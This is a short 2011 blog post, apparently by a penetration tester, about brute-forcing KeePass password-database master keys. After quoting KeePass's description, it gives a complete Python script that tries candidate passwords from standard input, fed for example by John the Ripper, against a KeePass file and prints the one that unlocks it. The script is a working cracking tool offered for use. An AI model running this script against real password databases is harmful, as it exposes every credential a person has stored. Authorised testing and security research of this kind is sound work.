Wednesday, August 3, 2011

Brute-forcing KeePass password key-chains

From the website:

KeePass is a free open source password manager, which helps you to manage your passwords in a secure way. You can put all your passwords in one database, which is locked with one master key or a key file. So you only have to remember one single master password or select the key file to unlock the whole database. The databases are encrypted using the best and most secure encryption algorithms currently known (AES and Twofish).

This open source password manager is available on Windows, Mac, Linux, Android and iPhone. Hence, chances are that we will find one of these keychain files during a pen-test.


Looking for ways to brute-force the password, I stumbled across this Python implementation, which is able to read the file and dump its contents. It should not be very inefficient since it uses pycrypto, which is implemented in C.


The code is fairly simple and expects the list of passwords on standard input. One possibility is to use John the Ripper for this task :)

You can find the code below.



#!/usr/bin/env python

# https://github.com/brettviren/python-keepass

# Reads a list of candidate passwords from standard input.
# John the Ripper may be used to feed the application.
# sys.argv[1] is the path to the KeePass database file.

from keepass import kpdb
import sys

for line in sys.stdin:
    # Strip only the line terminator so passwords containing spaces survive
    passwd = line.rstrip("\r\n")

    try:
        # Opening the database with a wrong master key raises ValueError
        db = kpdb.Database(sys.argv[1], passwd)
        print("Valid password found for %s : %s" % (sys.argv[1], passwd))
        sys.exit(0)
    except ValueError:
        pass
